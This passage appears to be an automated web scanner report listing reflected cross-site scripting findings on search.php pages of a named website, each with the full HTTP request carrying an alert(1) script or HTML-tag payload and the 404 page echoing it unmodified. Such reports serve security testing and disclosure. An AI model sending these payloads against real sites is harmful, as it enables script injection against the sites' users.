2.4062. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ebf68<script>alert(1)</script>92e5d6e7f95 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themesebf68<script>alert(1)</script>92e5d6e7f95/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themesebf68<script>alert(1)</script>92e5d6e7f95/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4063. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 65209<script>alert(1)</script>5ab0b1da3e6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos65209<script>alert(1)</script>5ab0b1da3e6/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos65209<script>alert(1)</script>5ab0b1da3e6/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4064. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 84f91<script>alert(1)</script>3a0853005b1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos/search.php84f91<script>alert(1)</script>3a0853005b1?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/search.php84f91<script>alert(1)</script>3a0853005b1?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4065. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 948d6<a>98a0d69a9d8 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /resources-information/ebooks/themes/kosmos/search.php?keyword=search...&Submit3=Search948d6<a>98a0d69a9d8&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/search.php?keyword=search...&Submit3=Search948d6<a>98a0d69a9d8&opt=2 was not found on this server.</p>
...[SNIP]...

2.4066. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 7605f<a>ebf28abae44 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /resources-information/ebooks/themes/kosmos/search.php?keyword=search...7605f<a>ebf28abae44&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/search.php?keyword=search...7605f<a>ebf28abae44&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4067. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ff9cd<script>alert(1)</script>3eb9a324c87 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&ff9cd<script>alert(1)</script>3eb9a324c87=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&ff9cd<script>alert(1)</script>3eb9a324c87=1 was not found on this server.</p>
...[SNIP]...

2.4068. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 45927<a>38fc69b3506 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /resources-information/ebooks/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=245927<a>38fc69b3506 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=245927<a>38fc69b3506 was not found on this server.</p>
...[SNIP]...

2.4069. http://www.resellerbase.com/resources-information/ebooks/themes/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 13959<script>alert(1)</script>7ca6668aea was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information13959<script>alert(1)</script>7ca6668aea/ebooks/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information13959<script>alert(1)</script>7ca6668aea/ebooks/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4070. http://www.resellerbase.com/resources-information/ebooks/themes/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 26864<script>alert(1)</script>84d305f13dd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks26864<script>alert(1)</script>84d305f13dd/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks26864<script>alert(1)</script>84d305f13dd/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4071. http://www.resellerbase.com/resources-information/ebooks/themes/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4c4d0<script>alert(1)</script>d37ab6bb80c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes4c4d0<script>alert(1)</script>d37ab6bb80c/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes4c4d0<script>alert(1)</script>d37ab6bb80c/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4072. http://www.resellerbase.com/resources-information/ebooks/themes/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c3992<script>alert(1)</script>3f8214e3a1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/search.phpc3992<script>alert(1)</script>3f8214e3a1?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/search.phpc3992<script>alert(1)</script>3f8214e3a1?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4073. http://www.resellerbase.com/resources-information/ebooks/themes/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 34415<a>f816c92d2b3 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /resources-information/ebooks/themes/search.php?keyword=search...&Submit3=Search34415<a>f816c92d2b3&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/search.php?keyword=search...&Submit3=Search34415<a>f816c92d2b3&opt=2 was not found on this server.</p>
...[SNIP]...

2.4074. http://www.resellerbase.com/resources-information/ebooks/themes/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 7b14d<a>9547a44aaab was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /resources-information/ebooks/themes/search.php?keyword=search...7b14d<a>9547a44aaab&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/search.php?keyword=search...7b14d<a>9547a44aaab&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4075. http://www.resellerbase.com/resources-information/ebooks/themes/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9edf4<script>alert(1)</script>86f6eeee724 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/search.php?keyword=search...&Submit3=Search&opt=2&9edf4<script>alert(1)</script>86f6eeee724=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/search.php?keyword=search...&Submit3=Search&opt=2&9edf4<script>alert(1)</script>86f6eeee724=1 was not found on this server.</p>
...[SNIP]...

2.4076. http://www.resellerbase.com/resources-information/ebooks/themes/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 67086<a>e376dd686eb was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /resources-information/ebooks/themes/search.php?keyword=search...&Submit3=Search&opt=267086<a>e376dd686eb HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/search.php?keyword=search...&Submit3=Search&opt=267086<a>e376dd686eb was not found on this server.</p>
...[SNIP]...

2.4077. http://www.resellerbase.com/resources-information/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d00a5<script>alert(1)</script>7c0a57dd497 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-informationd00a5<script>alert(1)</script>7c0a57dd497/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-informationd00a5<script>alert(1)</script>7c0a57dd497/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4078. http://www.resellerbase.com/resources-information/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5c93b<script>alert(1)</script>c6852c76d33 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/search.php5c93b<script>alert(1)</script>c6852c76d33?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/search.php5c93b<script>alert(1)</script>c6852c76d33?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4079. http://www.resellerbase.com/resources-information/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/resources-information/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 1a5d0<a>5a11755d175 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /resources-information/search.php?keyword=search...&Submit3=Search1a5d0<a>5a11755d175&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

